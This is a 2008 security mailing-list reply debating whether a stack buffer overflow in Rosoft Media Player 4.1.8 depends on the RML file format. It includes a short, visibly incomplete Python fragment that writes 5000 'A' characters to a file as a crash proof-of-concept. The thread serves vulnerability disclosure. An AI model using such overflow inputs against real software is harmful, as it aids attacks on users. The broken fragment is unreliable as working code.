Re: Re: Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow
- From: opexoc@xxxxxxxxx
- Date: 17 Mar 2008 23:27:31 -0000
I know this because I "tasted" the exploit without extension.
Actually, this is not the proof that the vulnerability is not connected with format, because program could read the file and judge that if this program has M3U format or RML or something else. But if we try following code we are sure:
content = (
"A" * 5000 + "\n"
fd = open("music","w");
print "FILE CREATED"
- Prev by Date: Re: Re: Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow
- Next by Date: [SECURITY] [DSA 1522-1] New unzip packages fix potential code execution
- Previous by thread: Re: Re: Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow
- Next by thread: XNview 1.92.1 Long Filename Overflow